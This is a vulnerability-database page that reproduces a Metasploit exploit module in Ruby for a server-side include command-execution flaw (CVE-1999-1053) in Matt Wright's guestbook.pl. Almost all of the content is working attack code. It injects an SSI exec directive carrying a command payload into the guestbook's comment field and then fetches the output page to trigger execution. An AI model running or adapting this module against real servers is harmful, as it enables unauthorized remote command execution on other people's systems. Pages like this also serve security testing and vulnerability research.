Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:66964
HistoryJul 01, 2014 - 12:00 a.m.

The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
40
JSON

No description provided by source.


                                                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Matt Wright guestbook.pl Arbitrary Command Execution&#39;,
			&#39;Description&#39;    =&#62; %q{
				The Matt Wright guestbook.pl &#60;= v2.3.1 CGI script contains
				a flaw that may allow arbitrary command execution. The vulnerability
				requires that HTML posting is enabled in the guestbook.pl script, and
				that the web server must have the Server-Side Include (SSI) script
				handler enabled for the &#39;.html&#39; file type. By combining the script
				weakness with non-default server configuration, it is possible to exploit
				this vulnerability successfully.
			},
			&#39;Author&#39;         =&#62; [ &#39;patrick&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision$&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;1999-1053&#39; ],
					[ &#39;OSVDB&#39;, &#39;84&#39; ],
					[ &#39;BID&#39;, &#39;776&#39; ],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;Payload&#39;        =&#62;
				{
					&#39;DisableNops&#39; =&#62; true,
					&#39;Space&#39;       =&#62; 1024,
					&#39;Compat&#39;      =&#62;
						{
							&#39;PayloadType&#39; =&#62; &#39;cmd&#39;,
							&#39;RequiredCmd&#39; =&#62; &#39;generic perl ruby bash telnet&#39;,
						}
				},		
			&#39;Platform&#39;       =&#62; [ &#39;unix&#39;, &#39;win&#39;, &#39;linux&#39; ],
			&#39;Arch&#39;           =&#62; ARCH_CMD,
			&#39;Targets&#39;        =&#62; [[ &#39;Automatic&#39;, { }]],
			&#39;DisclosureDate&#39; =&#62; &#39;Nov 05 1999&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))

			register_options(
				[
					OptString.new(&#39;URI&#39;, [true, &#34;guestbook.pl script path&#34;, &#34;/cgi-bin/guestbook.pl&#34;]),
					OptString.new(&#39;URIOUT&#39;, [true, &#34;guestbook.html output&#34;, &#34;/guestbook/guestbook.html&#34;]),
				], self.class)
	end

	def exploit
		realname	= rand_text_alphanumeric(20)
		email		= rand_text_alphanumeric(20)
		city		= rand_text_alphanumeric(20)
		state		= rand_text_alphanumeric(20)
		country		= rand_text_alphanumeric(20)

		sploit = Rex::Text.uri_encode(&#34;&#60;!--#exec cmd=\&#34;&#34; + payload.encoded.gsub(&#39;&#34;&#39;,&#39;\&#34;&#39;) + &#34;\&#34;&#34;, &#39;hex-normal&#39;)

		req1 = send_request_cgi({
			&#39;uri&#39;     =&#62; datastore[&#39;URI&#39;],
			&#39;method&#39;  =&#62; &#39;POST&#39;,
			&#39;data&#39;    =&#62; &#34;realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}&#34;,
		}, 25)

		req2 = send_request_raw({
			&#39;uri&#39;     =&#62; datastore[&#39;URIOUT&#39;],
		}, 25)
		
	end
end
JSON